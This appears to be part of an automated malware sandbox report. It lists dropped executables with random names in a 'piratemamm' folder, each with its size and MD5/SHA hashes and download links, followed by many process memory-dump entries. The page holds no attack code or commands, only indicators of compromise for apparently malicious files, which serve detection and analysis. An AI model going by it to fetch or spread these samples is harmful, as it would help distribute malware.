4.7MB

MD5
9944a67d27334533a9fd354736cf9294

SHA1
bc7ec3a4088ac8e319fb21b6311bb60f622ffbd8

SHA256
c1a96310dd45b906c51fd21fd604550225e1eec1941245850b24773e22768ad7

SHA512
9f13788bf0cf7d47710b6ca7e472181cc56bdf0003552712f01f8a9304baa060e3d2979c5e9a82e04a9cfa5b54af9c2b36d496403b3244470144d203ac29ceb4

Download Submit
C:\Users\Admin\Documents\piratemamm\T_YTzxJlVooXrmiBJHBPZXHo.exe

Filesize
4.1MB

MD5
a1b27a5183fbf4baa28e9f9c4bb76044

SHA1
b32eae8af49749ee3f808f111ba004ada86f757b

SHA256
a8bfc3d980453737fca6efeaf6dc14aee8b9d23aa24777c8dc8b38493aa003e1

SHA512
e6218f5233e11021b0171f77555330aa0e6302fa73805d9de7f19e56dbb62d34fd6db8beeec9c30be0de29838a78bbfe3911b2cc546f6a14ec326ce7d5a9150c

Download Submit
C:\Users\Admin\Documents\piratemamm\T_YTzxJlVooXrmiBJHBPZXHo.exe

Filesize
4.1MB

MD5
a3fc86696512a68337f2f98fb7d4dbb5

SHA1
ed64a3dd1e1f3b8aec79bd14090ff1516e7a838d

SHA256
602d6da9c868e03a403ab4df6704d42cc94d8b960fb5fd38575be1a5d2da327c

SHA512
006fd2ffbeb4c8349a5f1f3e390357fbf7d2256423087c971137450f1519d860a4274e07b0a0faf1e8de0b0f8351c1f066300d00b65a10ac5ee296de7116095e

Download Submit
C:\Users\Admin\Documents\piratemamm\VJYIyuiADO0D52ngpgOKwbKs.exe

Filesize
3.8MB

MD5
89e85ba145046ff7c1e4db2d5fb4f77d

SHA1
e23cb26f5d1b0ac8f9c214dd2daa7b67411232c4

SHA256
4156522e5d8cfa67de6fe042f8928188d3d227981182061280c10d66a1be589d

SHA512
3f8db8dcb18adc3405d37eea743c95957d8697565a85d843572b3bee8604824dfdf1c2bc39e350379ad5d3cbd76035a4d3b3a4b581b1e065cd2801427a282842

Download Submit
C:\Users\Admin\Documents\piratemamm\XrFfkFy0YAD6aCAZ5KenUouY.exe

Filesize
518KB

MD5
36d2cc77990dadf778e3cf1a2a2bd4e2

SHA1
15060d42946b78e67a2ffeb2362cc2452ee8f427

SHA256
3b833211198958855783c7c43c67fa795e4084857c4fed7a1d84114d6bda110b

SHA512
1927af1184cd28d0580a65d86569253029cc058d55368f2a90fb96ec22391ef4964331feb5196b7a66447f02416cc9eaec10dbb3d1e0995bf8ec60013004475f

Download Submit
C:\Users\Admin\Documents\piratemamm\eDKkS261ZGP96HkjeVJ8nzeD.exe

Filesize
1.8MB

MD5
58bfdb74b9a6fcd2d636ffa696a05835

SHA1
6ca53da7f430924afee96eefc5f73b9674de7c55

SHA256
37d0cb6ddcccfb079df58f606ba8cf159b5819121c8b277485228634a52d6364

SHA512
4471d94833e0b7eb599b64d1b71d53712ae7170319f099534ef6d4c5f9d235212512a3eedd8763eda7f21b8235c5751a3a6a314613db3016d87d3fa90bada5f1

Download Submit
C:\Users\Admin\Documents\piratemamm\jXYin0381nFHJ9ws6DquTxgv.exe

Filesize
5.2MB

MD5
83d3af71d10c452c550cf4eee904b1d5

SHA1
38ec96cecec9909ac25c092854b5687fba284117

SHA256
aa58f41a43d84854b3f41d145c784614c1bb8e603f6bffef7d2c4cbc9e6855d4

SHA512
d117b28a056fc850c0bf3813f26295eaa79797cb8d6c5644ee05c7fc8643cd8663c39a18a126ccea7c6efa64a8cfe661b062a2a83d939c3e1f2d30f67549fb87

Download Submit
C:\Users\Admin\Documents\piratemamm\wvXbn2WQZ6IWXm65CGJg6ITJ.exe

Filesize
582KB

MD5
ff694c38ce492c1a75a8ae81051f87db

SHA1
8105e804365826c371335bfda3f2a09889bc9b70

SHA256
589a295a9dff4f3c01dddeb854a413f1e3a0201595a08aa204775f7caf247172

SHA512
675d78693560490a04ebab98baaf32d27bf0ae6c129027cceca28da64b7fb11508744b746504fbc3e2b8c06c25da7eac3b428465c7df73c4418f41921a9a49cc

Download Submit
memory/1220-255-0x0000000000F60000-0x0000000001BDE000-memory.dmp

Filesize
12.5MB

Download
memory/1220-245-0x0000000000F60000-0x0000000001BDE000-memory.dmp

Filesize
12.5MB

Download
memory/1220-244-0x0000000000F60000-0x0000000001BDE000-memory.dmp

Filesize
12.5MB

Download
memory/1220-237-0x0000000000F60000-0x0000000001BDE000-memory.dmp

Filesize
12.5MB

Download
memory/1220-777-0x0000000000F60000-0x0000000001BDE000-memory.dmp

Filesize
12.5MB

Download
memory/1412-460-0x0000000000110000-0x00000000005C3000-memory.dmp

Filesize
4.7MB

Download
memory/1412-221-0x0000000000110000-0x00000000005C3000-memory.dmp

Filesize
4.7MB

Download
memory/1748-4365-0x0000000000510000-0x00000000009C3000-memory.dmp

Filesize
4.7MB

Download
memory/1748-4367-0x0000000000510000-0x00000000009C3000-memory.dmp

Filesize
4.7MB

Download
memory/1988-102-0x0000021BC0180000-0x0000021BC032E000-memory.dmp

Filesize
1.7MB

Download
memory/1988-205-0x0000021BC0180000-0x0000021BC032E000-memory.dmp

Filesize
1.7MB

Download
memory/1988-213-0x0000021BC0180000-0x0000021BC032E000-memory.dmp

Filesize
1.7MB

Download
memory/1988-103-0x0000021BC0180000-0x0000021BC032E000-memory.dmp

Filesize
1.7MB

Download
memory/1988-215-0x0000021BC0180000-0x0000021BC032E000-memory.dmp

Filesize
1.7MB

Download
memory/1988-209-0x0000021BC0180000-0x0000021BC032E000-memory.dmp

Filesize
1.7MB

Download
memory/1988-101-0x0000021BC0180000-0x0000021BC032E000-memory.dmp

Filesize
1.7MB

Download
memory/1988-97-0x0000021BC0180000-0x0000021BC032E000-memory.dmp

Filesize
1.7MB

Download
memory/1988-100-0x0000021BC0180000-0x0000021BC032E000-memory.dmp

Filesize
1.7MB

Download
memory/1988-104-0x0000021BC0180000-0x0000021BC032E000-memory.dmp

Filesize
1.7MB

Download
memory/1988-89-0x0000021BC0180000-0x0000021BC032E000-memory.dmp

Filesize
1.7MB

Download
memory/1988-161-0x0000021BC0180000-0x0000021BC032E000-memory.dmp

Filesize
1.7MB

Download
memory/1988-98-0x0000021BC0180000-0x0000021BC032E000-memory.dmp

Filesize
1.7MB

Download
memory/1988-99-0x0000021BC0180000-0x0000021BC032E000-memory.dmp

Filesize
1.7MB

Download
memory/1988-203-0x0000021BC0180000-0x0000021BC032E000-memory.dmp

Filesize
1.7MB

Download
memory/1988-218-0x0000021BC0180000-0x0000021BC032E000-memory.dmp

Filesize
1.7MB

Download
memory/1988-211-0x0000021BC0180000-0x0000021BC032E000-memory.dmp

Filesize
1.7MB

Download
memory/1988-207-0x0000021BC0180000-0x0000021BC032E000-memory.dmp

Filesize
1.7MB

Download
memory/1988-105-0x0000021BC0180000-0x0000021BC032E000-memory.dmp

Filesize
1.7MB

Download
memory/1988-86-0x0000021BC0180000-0x0000021BC032E000-memory.dmp

Filesize
1.7MB

Download
memory/1988-87-0x0000021BC0180000-0x0000021BC032E000-memory.dmp

Filesize
1.7MB

Download
memory/2840-489-0x0000000000400000-0x0000000000464000-memory.dmp

Filesize
400KB

Download
memory/2840-630-0x000000000A120000-0x000000000A64C000-memory.dmp

Filesize
5.2MB

Download
memory/2840-629-0x0000000009A20000-0x0000000009BE2000-memory.dmp

Filesize
1.8MB

Download
memory/2840-573-0x0000000008AA0000-0x0000000008B06000-memory.dmp

Filesize
408KB

Download
memory/3164-352-0x0000000005670000-0x00000000057CA000-memory.dmp

Filesize
1.4MB

Download
memory/3164-243-0x00000000055D0000-0x000000000566C000-memory.dmp

Filesize
624KB

Download
memory/3164-238-0x0000000000780000-0x0000000000CB6000-memory.dmp

Filesize
5.2MB

Download
memory/3388-433-0x0000000000400000-0x0000000000827000-memory.dmp

Filesize
4.2MB

Download
memory/3388-369-0x0000000000400000-0x0000000000827000-memory.dmp

Filesize
4.2MB

Download
memory/3472-463-0x0000000000510000-0x00000000009C3000-memory.dmp

Filesize
4.7MB

Download
memory/3472-889-0x0000000000510000-0x00000000009C3000-memory.dmp

Filesize
4.7MB

Download
memory/3528-286-0x0000000005760000-0x0000000005775000-memory.dmp

Filesize
84KB

Download
memory/3528-292-0x0000000005760000-0x0000000005775000-memory.dmp

Filesize
84KB

Download
memory/3528-277-0x0000000005870000-0x00000000059AE000-memory.dmp

Filesize
1.2MB

Download
memory/3528-278-0x0000000005760000-0x000000000577C000-memory.dmp

Filesize
112KB

Download
memory/3528-279-0x0000000005760000-0x0000000005775000-memory.dmp

Filesize
84KB

Download
memory/3528-280-0x0000000005760000-0x0000000005775000-memory.dmp

Filesize
84KB

Download
memory/3528-282-0x0000000005760000-0x0000000005775000-memory.dmp

Filesize
84KB

Download
memory/3528-284-0x0000000005760000-0x0000000005775000-memory.dmp

Filesize
84KB

Download
memory/3528-240-0x00000000009F0000-0x0000000000EB0000-memory.dmp

Filesize
4.8MB

Download
memory/3528-288-0x0000000005760000-0x0000000005775000-memory.dmp

Filesize
84KB

Download
memory/3528-290-0x0000000005760000-0x0000000005775000-memory.dmp

Filesize
84KB

Download
memory/3528-312-0x0000000005760000-0x0000000005775000-memory.dmp

Filesize
84KB

Download
memory/3528-294-0x0000000005760000-0x0000000005775000-memory.dmp

Filesize
84KB

Download
memory/3528-296-0x0000000005760000-0x0000000005775000-memory.dmp

Filesize
84KB

Download
memory/3528-298-0x0000000005760000-0x0000000005775000-memory.dmp

Filesize
84KB

Download
memory/3528-302-0x0000000005760000-0x0000000005775000-memory.dmp

Filesize
84KB

Download
memory/3528-304-0x0000000005760000-0x0000000005775000-memory.dmp

Filesize
84KB

Download
memory/3528-318-0x0000000005760000-0x0000000005775000-memory.dmp

Filesize
84KB

Download
memory/3528-316-0x0000000005760000-0x0000000005775000-memory.dmp

Filesize
84KB

Download
memory/3528-314-0x0000000005760000-0x0000000005775000-memory.dmp

Filesize
84KB

Download
memory/3528-306-0x0000000005760000-0x0000000005775000-memory.dmp

Filesize
84KB

Download
memory/3528-308-0x0000000005760000-0x0000000005775000-memory.dmp

Filesize
84KB

Download
memory/3528-310-0x0000000005760000-0x0000000005775000-memory.dmp

Filesize
84KB

Download
memory/4128-810-0x0000000004A10000-0x0000000004A5C000-memory.dmp

Filesize
304KB

Download
memory/4128-806-0x0000000004540000-0x0000000004894000-memory.dmp

Filesize
3.3MB

Download
memory/4384-462-0x00000000000C0000-0x000000000077F000-memory.dmp

Filesize
6.7MB

Download
memory/4384-858-0x00000000000C0000-0x000000000077F000-memory.dmp

Filesize
6.7MB

Download
memory/4408-232-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/4616-4224-0x0000000000510000-0x00000000009C3000-memory.dmp

Filesize
4.7MB

Download
memory/4616-4222-0x0000000000510000-0x00000000009C3000-memory.dmp

Filesize
4.7MB

Download
memory/4732-449-0x0000000000400000-0x0000000000827000-memory.dmp

Filesize
4.2MB

Download
memory/4732-825-0x0000000000400000-0x0000000000827000-memory.dmp

Filesize
4.2MB

Download
memory/4852-491-0x0000000006BF0000-0x0000000007208000-memory.dmp

Filesize
6.1MB

Download
memory/4852-492-0x0000000006740000-0x000000000684A000-memory.dmp

Filesize
1.0MB

Download
memory/4852-620-0x0000000007410000-0x0000000007460000-memory.dmp

Filesize
320KB

Download
memory/4852-461-0x00000000051C0000-0x00000000051CA000-memory.dmp

Filesize
40KB

Download
memory/4852-495-0x0000000006850000-0x000000000689C000-memory.dmp

Filesize
304KB

Download
memory/4852-494-0x00000000066E0000-0x000000000671C000-memory.dmp

Filesize
240KB

Download
memory/4852-454-0x00000000051D0000-0x0000000005262000-memory.dmp

Filesize
584KB

Download
memory/4852-493-0x0000000006680000-0x0000000006692000-memory.dmp

Filesize
72KB

Download
memory/4852-485-0x00000000065B0000-0x00000000065CE000-memory.dmp

Filesize
120KB

Download
memory/4852-444-0x0000000000400000-0x0000000000452000-memory.dmp

Filesize
328KB

Download
memory/4852-446-0x00000000056E0000-0x0000000005C84000-memory.dmp

Filesize
5.6MB

Download
memory/4852-480-0x0000000005F10000-0x0000000005F86000-memory.dmp

Filesize
472KB

Download
memory/5168-775-0x00000000000C0000-0x000000000077F000-memory.dmp

Filesize
6.7MB

Download
memory/5168-948-0x00000000000C0000-0x000000000077F000-memory.dmp

Filesize
6.7MB

Download
memory/5172-779-0x0000000000510000-0x00000000009C3000-memory.dmp

Filesize
4.7MB

Download
memory/5172-776-0x0000000000510000-0x00000000009C3000-memory.dmp

Filesize
4.7MB

Download
memory/5428-4319-0x0000000000510000-0x00000000009C3000-memory.dmp

Filesize
4.7MB

Download
memory/5428-4321-0x0000000000510000-0x00000000009C3000-memory.dmp

Filesize
4.7MB

Download
memory/6080-1756-0x0000000000510000-0x00000000009C3000-memory.dmp

Filesize
4.7MB

Download
memory/6080-1754-0x0000000000510000-0x00000000009C3000-memory.dmp

Filesize
4.7MB

Download
memory/6100-859-0x0000020AA3DC0000-0x0000020AA3DE2000-memory.dmp

Filesize
136KB

Download
memory/6212-986-0x0000000005050000-0x000000000509C000-memory.dmp

Filesize
304KB

Download
memory/6212-975-0x00000000048A0000-0x0000000004BF4000-memory.dmp

Filesize
3.3MB

Download
memory/6260-969-0x0000000004B30000-0x0000000004B7C000-memory.dmp

Filesize
304KB

Download
memory/6260-959-0x0000000004420000-0x0000000004774000-memory.dmp

Filesize
3.3MB

Download
memory/6480-1710-0x0000000000F70000-0x000000000162F000-memory.dmp

Filesize
6.7MB

Download
memory/6480-956-0x0000000000F70000-0x000000000162F000-memory.dmp

Filesize
6.7MB

Download
memory/6540-852-0x0000000004EF0000-0x0000000004F3C000-memory.dmp

Filesize
304KB

Download
memory/6540-843-0x0000000004220000-0x0000000004574000-memory.dmp

Filesize
3.3MB

Download
memory/6720-646-0x0000000006500000-0x000000000651E000-memory.dmp

Filesize
120KB

Download
memory/6720-619-0x0000000006070000-0x00000000063C4000-memory.dmp

Filesize
3.3MB

Download
memory/6720-614-0x00000000056C0000-0x00000000056E2000-memory.dmp

Filesize
136KB

Download
memory/6720-615-0x0000000005E90000-0x0000000005EF6000-memory.dmp

Filesize
408KB

Download
memory/6720-606-0x00000000056F0000-0x0000000005D18000-memory.dmp

Filesize
6.2MB

Download
memory/6720-605-0x0000000002FD0000-0x0000000003006000-memory.dmp

Filesize
216KB

Download
memory/6736-4284-0x0000000000510000-0x00000000009C3000-memory.dmp

Filesize
4.7MB

Download
memory/6736-4282-0x0000000000510000-0x00000000009C3000-memory.dmp

Filesize
4.7MB

Download
memory/7144-695-0x0000000006460000-0x000000000647A000-memory.dmp

Filesize
104KB

Download
memory/7144-696-0x0000000006E80000-0x0000000006EA2000-memory.dmp

Filesize
136KB

Download
memory/7144-694-0x0000000006F20000-0x0000000006FB6000-memory.dmp

Filesize
600KB

Download